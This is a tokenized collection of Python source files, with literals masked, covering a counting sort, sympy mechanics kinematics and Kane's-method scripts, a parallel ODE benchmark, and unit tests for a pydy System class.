] ) <EOL> got = output . getvalue ( ) <EOL> assert '<STR_LIT>' in got </s>
<s> def counting_sort ( array , maxval ) : <EOL> """<STR_LIT>""" <EOL> count = [ <NUM_LIT:0> ] * ( maxval + <NUM_LIT:1> ) <EOL> for a in array : <EOL> count [ a ] += <NUM_LIT:1> <EOL> i = <NUM_LIT:0> <EOL> for a in range ( maxval + <NUM_LIT:1> ) : <EOL> for c in range ( count [ a ] ) : <EOL> array [ i ] = a <EOL> i += <NUM_LIT:1> <EOL> return array </s>
<s> """<STR_LIT>""" <EOL> from sympy . physics . mechanics import dynamicsymbols , MechanicsStrPrinter <EOL> from sympy . physics . mechanics import ReferenceFrame , Point <EOL> from sympy import solve , symbols <EOL> def msprint ( expr ) : <EOL> pr = MechanicsStrPrinter ( ) <EOL> return pr . doprint ( expr ) <EOL> q0 , q1 , q2 = dynamicsymbols ( '<STR_LIT>' ) <EOL> q0d , q1d , q2d = dynamicsymbols ( '<STR_LIT>' , level = <NUM_LIT:1> ) <EOL> u1 , u2 , u3 = dynamicsymbols ( '<STR_LIT>' ) <EOL> LA , LB , LP = symbols ( '<STR_LIT>' ) <EOL> p1 , p2 , p3 = symbols ( '<STR_LIT>' ) <EOL> E = ReferenceFrame ( '<STR_LIT:E>' ) <EOL> A = E . orientnew ( '<STR_LIT:A>' , '<STR_LIT>' , [ q0 , E . x ] ) <EOL> B = A . orientnew ( '<STR_LIT:B>' , '<STR_LIT>' , [ q1 , A . y ] ) <EOL> C = B . orientnew ( '<STR_LIT:C>' , '<STR_LIT>' , [ <NUM_LIT:0> , B . x ] ) <EOL> D = C . orientnew ( '<STR_LIT:D>' , '<STR_LIT>' , [ <NUM_LIT:0> , C . x ] ) <EOL> pO = Point ( '<STR_LIT:O>' ) <EOL> pAs = pO . locatenew ( '<STR_LIT>' , LA * A . z ) <EOL> pP = pO . locatenew ( '<STR_LIT:P>' , LP * A . z ) <EOL> pBs = pP . locatenew ( '<STR_LIT>' , LB * B . z ) <EOL> pCs = pBs . locatenew ( '<STR_LIT>' , q2 * B . z ) <EOL> pDs = pCs . locatenew ( '<STR_LIT>' , p1 * B . x + p2 * B . y + p3 * B . z ) <EOL> A . set_ang_vel ( E , u1 * A . x ) <EOL> B . set_ang_vel ( A , u2 * B . y ) <EOL> pCs . set_vel ( B , u3 * B . z ) <EOL> pO . set_vel ( E , <NUM_LIT:0> ) <EOL> pAs . v2pt_theory ( pO , E , A ) <EOL> pP . v2pt_theory ( pO , E , A ) <EOL> pBs . v2pt_theory ( pP , E , B ) <EOL> pCs . v1pt_theory ( pBs , E , B ) <EOL> pDs . set_vel ( B , pCs . vel ( B ) ) <EOL> pDs . v1pt_theory ( pBs , E , B ) <EOL> kinematic_eqs = [ ] <EOL> kinematic_eqs . append ( u1 - q0d ) <EOL> kinematic_eqs . append ( u2 - q1d ) <EOL> kinematic_eqs . append ( u3 - q2d ) <EOL> soln = solve ( kinematic_eqs , [ q0d , q1d , q2d ] ) <EOL> print ( "<STR_LIT>" ) <EOL> for qd in [ q0d , q1d , q2d ] : <EOL> print ( "<STR_LIT>" . format ( msprint ( qd ) , msprint ( soln [ qd ] ) ) ) <EOL> ang_vels = [ "<STR_LIT>" ] <EOL> ang_accs = [ "<STR_LIT>" ] <EOL> for rf in [ A , B , C , D ] : <EOL> ang_v = getattr ( rf , '<STR_LIT>' ) ( E ) <EOL> ang_a = getattr ( rf , '<STR_LIT>' ) ( E ) <EOL> express_rf = B <EOL> if rf == A : <EOL> express_rf = A <EOL> ang_vels . append ( "<STR_LIT>" . format ( <EOL> rf , E , ang_v . express ( express_rf ) ) ) <EOL> ang_accs . append ( "<STR_LIT>" . format ( <EOL> rf , E , ang_a . express ( express_rf ) ) ) <EOL> vels = [ "<STR_LIT>" ] <EOL> accs = [ "<STR_LIT>" ] <EOL> for point in [ pAs , pBs , pCs , pDs ] : <EOL> v = getattr ( point , '<STR_LIT>' ) ( E ) <EOL> a = getattr ( point , '<STR_LIT>' ) ( E ) <EOL> express_rf = B <EOL> if point == pAs : <EOL> express_rf = A <EOL> vels . append ( "<STR_LIT>" . format ( <EOL> point , E , v . express ( express_rf ) ) ) <EOL> accs . append ( "<STR_LIT>" . format ( <EOL> point , E , a . express ( express_rf ) ) ) <EOL> for results in ang_vels + ang_accs + vels + accs : <EOL> print ( results ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> from sympy import diff , solve , simplify , symbols <EOL> from sympy . physics . mechanics import ReferenceFrame , Point , Particle <EOL> from sympy . physics . mechanics import dot , dynamicsymbols <EOL> from util import msprint , subs , partial_velocities <EOL> from util import generalized_active_forces , generalized_inertia_forces <EOL> g , L , m1 , m2 , omega , t = symbols ( '<STR_LIT>' ) <EOL> C , X , Y , Z = symbols ( '<STR_LIT>' ) <EOL> q1 , q2 , q3 = dynamicsymbols ( '<STR_LIT>' ) <EOL> q1d , q2d , q3d = dynamicsymbols ( '<STR_LIT>' , level = <NUM_LIT:1> ) <EOL> u1 , u2 , u3 = dynamicsymbols ( '<STR_LIT>' ) <EOL> A = ReferenceFrame ( '<STR_LIT:A>' ) <EOL> B = A . orientnew ( '<STR_LIT:B>' , '<STR_LIT>' , [ omega * t , A . y ] ) <EOL> E = B . orientnew ( '<STR_LIT:E>' , '<STR_LIT>' , [ q3 , B . z ] ) <EOL> pO = Point ( '<STR_LIT:O>' ) <EOL> pO . set_vel ( A , <NUM_LIT:0> ) <EOL> pO . set_vel ( B , <NUM_LIT:0> ) <EOL> pP1 = pO . locatenew ( '<STR_LIT>' , q1 * B . x + q2 * B . y ) <EOL> pDs = pP1 . locatenew ( '<STR_LIT>' , L * E . x ) <EOL> pP1 . set_vel ( E , <NUM_LIT:0> ) <EOL> pP1 . set_vel ( B , pP1 . pos_from ( pO ) . diff ( t , B ) ) <EOL> pP1 . v1pt_theory ( pO , A , B ) <EOL> pDs . set_vel ( E , <NUM_LIT:0> ) <EOL> pDs . v2pt_theory ( pP1 , B , E ) <EOL> pDs . v2pt_theory ( pP1 , A , E ) <EOL> u_expr = [ dot ( pP1 . vel ( A ) , E . x ) , dot ( pP1 . vel ( A ) , E . y ) , q3d ] <EOL> ulist = [ u1 , u2 , u3 ] <EOL> R1 = X * B . z + C * E . x - m1 * g * B . y <EOL> R2 = Y * E . y + Z * E . z - C * E . x - m2 * g * B . y <EOL> resultants = [ R1 , R2 ] <EOL> forces = [ ( pP1 , R1 ) , ( pDs , R2 ) ] <EOL> point_masses = [ Particle ( '<STR_LIT>' , pP1 , m1 ) , Particle ( '<STR_LIT>' , pDs , m2 ) ] <EOL> points = [ f [ <NUM_LIT:0> ] for f in forces ] <EOL> kde = [ u_i - u_ex for u_i , u_ex in zip ( ulist , u_expr ) ] <EOL> kde_map = solve ( kde , [ q1d , q2d , q3d ] ) <EOL> for k , v in kde_map . items ( ) : <EOL> kde_map [ k . diff ( t ) ] = v . diff ( t ) <EOL> partials = partial_velocities ( points , [ u1 , u2 , u3 ] , A , kde_map ) <EOL> Fr , _ = generalized_active_forces ( partials , forces ) <EOL> Fr_star , _ = generalized_inertia_forces ( partials , point_masses , kde_map ) <EOL> vc = [ dot ( pDs . vel ( B ) , E . y ) ] <EOL> vc_map = solve ( subs ( vc , kde_map ) , [ u3 ] ) <EOL> partials_tilde = partial_velocities ( points , [ u1 , u2 ] , A , kde_map , vc_map ) <EOL> Fr_tilde , _ = generalized_active_forces ( partials_tilde , forces ) <EOL> Fr_tilde_star , _ = generalized_inertia_forces ( partials_tilde , point_masses , <EOL> kde_map , vc_map ) <EOL> print ( "<STR_LIT>" . format ( msprint ( u_expr ) ) ) <EOL> print ( "<STR_LIT>" ) <EOL> for i , f in enumerate ( Fr , <NUM_LIT:1> ) : <EOL> print ( "<STR_LIT>" . format ( i , msprint ( simplify ( f ) ) ) ) <EOL> print ( "<STR_LIT>" ) <EOL> for i , f in enumerate ( Fr_star , <NUM_LIT:1> ) : <EOL> print ( "<STR_LIT>" . format ( i , msprint ( simplify ( f ) ) ) ) <EOL> print ( "<STR_LIT>" ) <EOL> for i , f in enumerate ( Fr_tilde , <NUM_LIT:1> ) : <EOL> print ( "<STR_LIT>" . format ( i , msprint ( simplify ( f ) ) ) ) <EOL> print ( "<STR_LIT>" ) <EOL> for i , f in enumerate ( Fr_tilde_star , <NUM_LIT:1> ) : <EOL> print ( "<STR_LIT>" . format ( i , msprint ( simplify ( f ) ) ) ) <EOL> print ( "<STR_LIT>" ) <EOL> A31 , A32 = map ( lambda x : diff ( vc_map [ u3 ] , x ) , [ u1 , u2 ] ) <EOL> print ( "<STR_LIT>" . format ( msprint ( simplify ( Fr [ <NUM_LIT:0> ] + A31 * Fr [ <NUM_LIT:2> ] ) ) ) ) <EOL> print ( "<STR_LIT>" . format ( msprint ( simplify ( Fr [ <NUM_LIT:1> ] + A32 * Fr [ <NUM_LIT:2> ] ) ) ) ) <EOL> print ( "<STR_LIT>" . format ( msprint ( simplify ( <EOL> ( Fr_star [ <NUM_LIT:0> ] + A31 * Fr_star [ <NUM_LIT:2> ] ) . subs ( vc_map ) ) ) ) ) <EOL> print ( "<STR_LIT>" . format ( msprint ( simplify ( <EOL> ( Fr_star [ <NUM_LIT:1> ] + A32 * Fr_star [ <NUM_LIT:2> ] ) . subs ( vc_map ) ) ) ) ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from scipy . integrate import odeint <EOL> from joblib import Parallel , delayed <EOL> from pydy . models import n_link_pendulum_on_cart <EOL> print ( '<STR_LIT>' ) <EOL> sys = n_link_pendulum_on_cart ( <NUM_LIT:10> , False , False ) <EOL> print ( '<STR_LIT>' ) <EOL> x = np . random . random ( len ( sys . states ) ) <EOL> t = np . linspace ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) <EOL> p_set = np . random . random ( ( <NUM_LIT:16> , len ( sys . constants_symbols ) ) ) <EOL> print ( '<STR_LIT>' ) <EOL> rhs = sys . generate_ode_function ( generator = '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> def rhs_wrapper ( p ) : <EOL> return rhs ( x , t [ <NUM_LIT:0> ] , p ) <EOL> def odeint_wrapper ( p ) : <EOL> return odeint ( rhs , x , t , args = ( p , ) ) <EOL> print ( '<STR_LIT>' ) <EOL> res1 = Parallel ( n_jobs = - <NUM_LIT:1> ) ( delayed ( rhs_wrapper ) ( p ) for p in p_set ) <EOL> print ( '<STR_LIT>' ) <EOL> res2 = Parallel ( n_jobs = - <NUM_LIT:1> ) ( delayed ( odeint_wrapper ) ( p ) for p in p_set ) </s>
<s> import warnings <EOL> import numpy as np <EOL> from numpy import testing <EOL> import sympy as sm <EOL> import sympy . physics . mechanics as me <EOL> from scipy . integrate import odeint <EOL> theano = sm . external . import_module ( '<STR_LIT>' ) <EOL> from . . system import System <EOL> from . . models import multi_mass_spring_damper , n_link_pendulum_on_cart <EOL> from . . utils import sympy_equal_to_or_newer_than , PyDyImportWarning <EOL> SYMPY_VERSION = sm . __version__ <EOL> warnings . simplefilter ( '<STR_LIT>' , PyDyImportWarning ) <EOL> class TestSystem ( ) : <EOL> def setup ( self ) : <EOL> self . sys = multi_mass_spring_damper ( <NUM_LIT:1> , apply_gravity = True , <EOL> apply_external_forces = True ) <EOL> self . specified_symbol = next ( iter ( self . sys . specifieds_symbols ) ) <EOL> self . constant_map = dict ( zip ( sm . symbols ( '<STR_LIT>' ) , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> ] ) ) <EOL> self . sys . specifieds = { self . specified_symbol : np . ones ( <NUM_LIT:1> ) } <EOL> self . sys . constants = self . constant_map <EOL> self . kane = self . sys . eom_method <EOL> self . kane_nlink = n_link_pendulum_on_cart ( <NUM_LIT:3> , cart_force = True , <EOL> joint_torques = True ) . eom_method <EOL> def test_init ( self ) : <EOL> sys = System ( self . kane ) <EOL> assert ( sys . constants_symbols == <EOL> set ( sm . symbols ( '<STR_LIT>' ) ) ) <EOL> assert sys . specifieds_symbols == { self . specified_symbol } <EOL> assert sys . states == me . dynamicsymbols ( '<STR_LIT>' ) <EOL> assert sys . evaluate_ode_function is None <EOL> assert sys . eom_method is self . kane <EOL> assert sys . ode_solver is odeint <EOL> assert sys . specifieds == dict ( ) <EOL> assert sys . initial_conditions == dict ( ) <EOL> assert sys . constants == dict ( ) <EOL> assert sys . times == list ( ) <EOL> ic = { me . dynamicsymbols ( '<STR_LIT>' ) : <NUM_LIT> , me . dynamicsymbols ( '<STR_LIT>' ) : <NUM_LIT> } <EOL> sys = System ( self . kane , <EOL> ode_solver = odeint , <EOL> specifieds = { self . specified_symbol : np . ones ( <NUM_LIT:1> ) } , <EOL> initial_conditions = ic , <EOL> constants = self . constant_map ) <EOL> assert sys . eom_method is self . kane <EOL> assert list ( sys . specifieds . keys ( ) ) == [ me . dynamicsymbols ( '<STR_LIT>' ) ] <EOL> testing . assert_allclose ( list ( sys . specifieds . values ( ) ) , <EOL> [ np . ones ( <NUM_LIT:1> ) ] ) <EOL> assert sys . initial_conditions . keys ( ) == ic . keys ( ) <EOL> testing . assert_allclose ( list ( sys . initial_conditions . values ( ) ) , <EOL> list ( ic . values ( ) ) ) <EOL> assert sys . constants . keys ( ) == self . constant_map . keys ( ) <EOL> testing . assert_allclose ( list ( sys . constants . values ( ) ) , <EOL> list ( self . constant_map . values ( ) ) ) <EOL> sys = System ( self . kane , <EOL> ode_solver = odeint , <EOL> specifieds = { '<STR_LIT>' : [ self . specified_symbol ] , <EOL> '<STR_LIT>' : np . ones ( <NUM_LIT:1> ) } , <EOL> initial_conditions = ic , <EOL> constants = self . constant_map ) <EOL> def test_coordinates ( self ) : <EOL> if sympy_equal_to_or_newer_than ( '<STR_LIT>' ) : <EOL> assert self . sys . coordinates == self . kane . q [ : ] <EOL> else : <EOL> assert self . sys . coordinates == self . kane . _q <EOL> def test_speeds ( self ) : <EOL> if sympy_equal_to_or_newer_than ( '<STR_LIT>' ) : <EOL> assert self . sys . speeds == self . kane . u [ : ] <EOL> else : <EOL> assert self . sys . speeds == self . kane . _u <EOL> def test_states ( self ) : <EOL> if sympy_equal_to_or_newer_than ( '<STR_LIT>' ) : <EOL> assert self . sys . states == self . kane . q [ : ] + self . kane . u [ : ] <EOL> else : <EOL> assert self . sys . states == self . kane . _q + self . kane . _u <EOL> def test_constants ( self ) : <EOL> constants = { sm . symbols ( '<STR_LIT>' ) : <NUM_LIT> , sm . symbols ( '<STR_LIT>' ) : <NUM_LIT> } <EOL> sys = System ( self . kane , constants = constants ) <EOL> assert sys . constants . keys ( ) == constants . keys ( ) <EOL> testing . assert_allclose ( list ( sys . constants . values ( ) ) , <EOL> list ( constants . values ( ) ) ) <EOL> sys = System ( self . kane ) <EOL> assert sys . constants == dict ( ) <EOL> sys . constants = constants <EOL> assert sys . constants . keys ( ) == constants . keys ( ) <EOL> testing . assert_allclose ( list ( sys . constants . values ( ) ) , <EOL> list ( constants . values ( ) ) ) <EOL> sys = System ( self . kane ) <EOL> sys . constants [ sm . symbols ( '<STR_LIT>' ) ] = <NUM_LIT> <EOL> assert list ( sys . constants . keys ( ) ) == [ sm . symbols ( '<STR_LIT>' ) ] <EOL> testing . assert_allclose ( list ( sys . constants . values ( ) ) , [ <NUM_LIT> ] ) <EOL> sys . constants [ me . dynamicsymbols ( '<STR_LIT>' ) ] = <NUM_LIT> <EOL> sys . times = [ <NUM_LIT:0.0> , <NUM_LIT:1.0> ] <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . integrate ( ) <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . constants = { me . dynamicsymbols ( '<STR_LIT>' ) : <NUM_LIT> } <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . constants = { me . dynamicsymbols ( '<STR_LIT>' ) : <NUM_LIT> } <EOL> def test_specifieds ( self ) : <EOL> sys = System ( self . kane ) <EOL> assert sys . specifieds == dict ( ) <EOL> sys . specifieds = { me . dynamicsymbols ( '<STR_LIT>' ) : <NUM_LIT> } <EOL> assert list ( sys . specifieds . keys ( ) ) == [ me . dynamicsymbols ( '<STR_LIT>' ) ] <EOL> testing . assert_allclose ( list ( sys . specifieds . values ( ) ) , [ <NUM_LIT> ] ) <EOL> sys . specifieds [ me . dynamicsymbols ( '<STR_LIT>' ) ] = <NUM_LIT> <EOL> assert list ( sys . specifieds . keys ( ) ) == [ me . dynamicsymbols ( '<STR_LIT>' ) ] <EOL> testing . assert_allclose ( list ( sys . specifieds . values ( ) ) , [ <NUM_LIT> ] ) <EOL> sys . specifieds [ me . dynamicsymbols ( '<STR_LIT>' ) ] = <NUM_LIT> <EOL> sys . times = [ <NUM_LIT:0.0> , <NUM_LIT:1.0> ] <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . integrate ( ) <EOL> sys = System ( self . kane ) <EOL> sys . specifieds [ me . dynamicsymbols ( '<STR_LIT>' ) ] = <NUM_LIT> * np . ones ( <NUM_LIT:2> ) <EOL> sys = System ( self . kane ) <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . specifieds = { sm . symbols ( '<STR_LIT>' ) : <NUM_LIT> } <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . specifieds = { me . dynamicsymbols ( '<STR_LIT>' ) : <NUM_LIT> } <EOL> sys = System ( self . kane_nlink ) <EOL> spec_syms = list ( sys . specifieds_symbols ) <EOL> times = np . linspace ( <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:10> ) <EOL> sys . specifieds = { <EOL> spec_syms [ <NUM_LIT:0> ] : lambda x , t : np . ones ( t ) , <EOL> ( spec_syms [ <NUM_LIT:3> ] , spec_syms [ <NUM_LIT:1> ] ) : lambda x , t : np . array ( [ <NUM_LIT:4> , <NUM_LIT:2> ] ) , <EOL> spec_syms [ <NUM_LIT:2> ] : <NUM_LIT> * np . ones ( <NUM_LIT:1> ) } <EOL> sys . specifieds [ spec_syms [ <NUM_LIT:1> ] ] = <NUM_LIT> <EOL> sys . times = times <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . integrate ( ) <EOL> sys = System ( self . kane_nlink ) <EOL> sys . specifieds [ spec_syms [ <NUM_LIT:0> ] ] = <NUM_LIT> <EOL> sys . specifieds [ ( spec_syms [ <NUM_LIT:0> ] , spec_syms [ <NUM_LIT:3> ] ) ] = <NUM_LIT> <EOL> sys . times = times <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . integrate ( ) <EOL> sys . specifieds . pop ( spec_syms [ <NUM_LIT:0> ] ) <EOL> sys . integrate ( ) <EOL> sys = System ( self . kane_nlink ) <EOL> spec_syms = list ( sys . specifieds_symbols ) <EOL> sys . specifieds = dict ( zip ( spec_syms , [ <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) ) <EOL> sys . times = times <EOL> x_01 = sys . integrate ( ) <EOL> sys . specifieds = { '<STR_LIT>' : spec_syms , <EOL> '<STR_LIT>' : [ <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] } <EOL> x_02 = sys . integrate ( ) <EOL> testing . assert_allclose ( x_01 , x_02 ) <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . specifieds = { '<STR_LIT>' : [ sm . symbols ( '<STR_LIT>' ) ] , '<STR_LIT>' : [ <NUM_LIT:1.0> ] } <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . specifieds = { '<STR_LIT>' : [ sm . symbols ( '<STR_LIT>' ) ] , <EOL> '<STR_LIT>' : [ <NUM_LIT:1> , <NUM_LIT:2> ] } <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . specifieds = { '<STR_LIT>' : [ me . dynamicsymbols ( '<STR_LIT>' ) ] , <EOL> '<STR_LIT>' : [ <NUM_LIT:1.0> ] } <EOL> sys . specifieds = { <EOL> '<STR_LIT>' : [ spec_syms [ <NUM_LIT:1> ] , spec_syms [ <NUM_LIT:0> ] , spec_syms [ <NUM_LIT:2> ] , <EOL> spec_syms [ <NUM_LIT:3> ] ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ] } <EOL> sys . generate_ode_function ( ) <EOL> x_04 = sys . integrate ( ) <EOL> testing . assert_allclose ( x_01 , x_04 ) <EOL> sys = multi_mass_spring_damper ( <NUM_LIT:1> , apply_gravity = True ) <EOL> sys . initial_conditions = { me . dynamicsymbols ( '<STR_LIT>' ) : <NUM_LIT:0.1> , <EOL> me . dynamicsymbols ( '<STR_LIT>' ) : - <NUM_LIT:1.0> } <EOL> sys . times = times <EOL> sys . integrate ( ) <EOL> def test_times ( self ) : <EOL> times1 = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> ] <EOL> times2 = [ <NUM_LIT:0> , - <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT:3> , - <NUM_LIT:5> ] <EOL> times3 = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT:4> , <NUM_LIT:5> ] <EOL> times4 = <NUM_LIT:4> <EOL> sys = System ( self . kane , times = times1 ) <EOL> testing . assert_allclose ( sys . times , times1 ) <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . times = times2 <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . times = times3 <EOL> with testing . assert_raises ( TypeError ) : <EOL> sys . times = times4 <EOL> def test_ode_solver ( self ) : <EOL> assert self . sys . ode_solver == odeint <EOL> self . sys . ode_solver = max <EOL> assert self . sys . ode_solver is max <EOL> with testing . assert_raises ( ValueError ) : <EOL> self . sys . ode_solver = <NUM_LIT:5> <EOL> def test_initial_conditions ( self ) : <EOL> ic = { me . dynamicsymbols ( '<STR_LIT>' ) : <NUM_LIT> } <EOL> sys = System ( self . kane , initial_conditions = ic ) <EOL> assert sys . initial_conditions . keys ( ) == ic . keys ( ) <EOL> testing . assert_allclose ( list ( sys . initial_conditions . values ( ) ) , <EOL> list ( ic . values ( ) ) ) <EOL> sys = System ( self . kane ) <EOL> sys . initial_conditions = ic <EOL> assert sys . initial_conditions . keys ( ) == ic . keys ( ) <EOL> testing . assert_allclose ( list ( sys . initial_conditions . values ( ) ) , <EOL> list ( ic . values ( ) ) ) <EOL> sys = System ( self . kane , times = [ <NUM_LIT:0.0> , <NUM_LIT:1.0> ] ) <EOL> sys . initial_conditions [ me . dynamicsymbols ( '<STR_LIT>' ) ] = <NUM_LIT> <EOL> assert list ( sys . initial_conditions . keys ( ) ) == [ me . dynamicsymbols ( '<STR_LIT>' ) ] <EOL> testing . assert_allclose ( list ( sys . initial_conditions . values ( ) ) , [ <NUM_LIT> ] ) <EOL> sys . initial_conditions [ sm . symbols ( '<STR_LIT>' ) ] = <NUM_LIT> <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . integrate ( ) <EOL> with testing . assert_raises ( ValueError ) : <EOL> self . sys . initial_conditions = { sm . symbols ( '<STR_LIT>' ) : <NUM_LIT> } <EOL> with testing . assert_raises ( ValueError ) : <EOL> self . sys . initial_conditions = { sm . symbols ( '<STR_LIT>' ) : <NUM_LIT> } <EOL> def test_generate_ode_function ( self ) : <EOL> rhs = self . sys . generate_ode_function ( ) <EOL> assert rhs is self . sys . evaluate_ode_function <EOL> args = ( self . sys . specifieds , self . sys . constants ) <EOL> actual = rhs ( np . ones ( <NUM_LIT:2> ) , <NUM_LIT:0.0> , * args ) <EOL> testing . assert_allclose ( actual , np . array ( [ <NUM_LIT:1> , <NUM_LIT> ] ) ) <EOL> sys = System ( self . kane_nlink ) <EOL> spec_syms = list ( sys . specifieds_symbols ) <EOL> rhs = sys . generate_ode_function ( ) <EOL> x = np . array ( np . random . random ( len ( sys . states ) ) ) <EOL> args = ( self . sys . specifieds , <EOL> { k : <NUM_LIT:1.0> for k in sys . constants_symbols } ) <EOL> args = ( dict ( zip ( spec_syms , [ <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) ) , <EOL> { k : <NUM_LIT:1.0> for k in sys . constants_symbols } ) <EOL> xd_01 = rhs ( x , <NUM_LIT:0.0> , * args ) <EOL> args = ( { spec_syms [ <NUM_LIT:0> ] : lambda x , t : np . ones ( <NUM_LIT:1> ) , <EOL> ( spec_syms [ <NUM_LIT:3> ] , spec_syms [ <NUM_LIT:1> ] ) : lambda x , t : np . array ( [ <NUM_LIT:4> , <NUM_LIT:2> ] ) , <EOL> spec_syms [ <NUM_LIT:2> ] : <NUM_LIT> * np . ones ( <NUM_LIT:1> ) } , <EOL> { k : <NUM_LIT:1.0> for k in sys . constants_symbols } ) <EOL> xd_02 = rhs ( x , <NUM_LIT:0.0> , * args ) <EOL> testing . assert_allclose ( xd_01 , xd_02 ) <EOL> def test_integrate ( self ) : <EOL> times = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:100> ) <EOL> sys = System ( self . kane , times = times ) <EOL> x_01 = sys . integrate ( ) <EOL> sys = System ( self . kane , times = times ) <EOL> sys . generate_ode_function ( generator = '<STR_LIT>' ) <EOL> x_02 = sys . integrate ( ) <EOL> testing . assert_allclose ( x_01 , x_02 ) <EOL> constants_dict = dict ( zip ( sm . symbols ( '<STR_LIT>' ) , <EOL> [ <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) ) <EOL> specified_dict = { me . dynamicsymbols ( '<STR_LIT>' ) : <NUM_LIT:0.0> } <EOL> x_03 = sys . ode_solver ( sys . evaluate_ode_function , [ <NUM_LIT:0> , <NUM_LIT:0> ] , sys . times , <EOL> args = ( specified_dict , constants_dict ) ) <EOL> testing . assert_allclose ( x_02 , x_03 ) <EOL> sys = System ( self . kane , times = times ) <EOL> x0 = [ <NUM_LIT> , <NUM_LIT> ] <EOL> ic = { me . dynamicsymbols ( '<STR_LIT>' ) : x0 [ <NUM_LIT:0> ] , me . dynamicsymbols ( '<STR_LIT>' ) : x0 [ <NUM_LIT:1> ] } <EOL> sys . initial_conditions = ic <EOL> x_04 = sys . integrate ( ) <EOL> x_05 = sys . ode_solver ( <EOL> sys . evaluate_ode_function , x0 , sys . times , <EOL> args = ( sys . _specifieds_padded_with_defaults ( ) , <EOL> sys . _constants_padded_with_defaults ( ) ) ) <EOL> testing . assert_allclose ( x_04 , x_05 ) <EOL> if theano : <EOL> sys . generate_ode_function ( generator = '<STR_LIT>' ) <EOL> sys . times = times <EOL> x_06 = sys . integrate ( ) <EOL> testing . assert_allclose ( x_04 , x_06 ) <EOL> else : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" , PyDyImportWarning ) <EOL> sys = System ( self . kane , times = times ) <EOL> with testing . assert_raises ( NotImplementedError ) : <EOL> sys . generate_ode_function ( generator = '<STR_LIT>' ) <EOL> def test_specifying_coordinate_issue_339 ( ) : <EOL> """<STR_LIT>""" <EOL> beta = me . dynamicsymbols ( '<STR_LIT>' ) <EOL> q1 , q2 , q3 , q4 = me . dynamicsymbols ( '<STR_LIT>' ) <EOL> u1 , u2 , u3 , u4 = me . dynamicsymbols ( '<STR_LIT>' ) <EOL> N = me . ReferenceFrame ( '<STR_LIT:N>' ) <EOL> A = N . orientnew ( '<STR_LIT:A>' , '<STR_LIT>' , ( q1 , N . x ) ) <EOL> B = A . orientnew ( '<STR_LIT:B>' , '<STR_LIT>' , ( beta , A . y ) ) <EOL> No = me . Point ( '<STR_LIT>' ) <EOL> Ao = No . locatenew ( '<STR_LIT>' , q2 * N . x + q3 * N . y + q4 * N . z ) <EOL> Bo = Ao . locatenew ( '<STR_LIT>' , <NUM_LIT:10> * A . x + <NUM_LIT:10> * A . y + <NUM_LIT:10> * A . z ) <EOL> A . set_ang_vel ( N , u1 * N . x ) <EOL> B . ang_vel_in ( N ) <EOL> No . set_vel ( N , <NUM_LIT:0> ) <EOL> Ao . set_vel ( N , u2 * N . x + u3 * N . y + u4 * N . z ) <EOL> Bo . v2pt_theory ( Ao , N , B ) <EOL> body_A = me . RigidBody ( '<STR_LIT:A>' , Ao , A , <NUM_LIT:1.0> , ( me . inertia ( A , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) , Ao ) ) <EOL> body_B = me . RigidBody ( '<STR_LIT:B>' , Bo , B , <NUM_LIT:1.0> , ( me . inertia ( A , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> ) , Bo ) ) <EOL> bodies = [ body_A , body_B ] <EOL> loads = [ ( No , <NUM_LIT:0> * N . x ) ] <EOL> kdes = [ u1 - q1 . diff ( ) , <EOL> u2 - q2 . diff ( ) , <EOL> u3 - q3 . diff ( ) , <EOL> u4 - q4 . diff ( ) ] <EOL> kane = me . KanesMethod ( N , q_ind = [ q1 , q2 , q3 , q4 ] , <EOL> u_ind = [ u1 , u2 , u3 , u4 ] , kd_eqs = kdes ) <EOL> fr , frstar = kane . kanes_equations ( loads , bodies ) <EOL> sys = System ( kane ) <EOL> sys . specifieds = { ( beta , beta . diff ( ) , beta . diff ( ) . diff ( ) ) : <EOL> lambda x , t : np . array ( [ <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) } <EOL> sys . times = np . linspace ( <NUM_LIT:0> , <NUM_LIT:10> , <NUM_LIT:20> ) <EOL> sys . integrate ( ) </s>
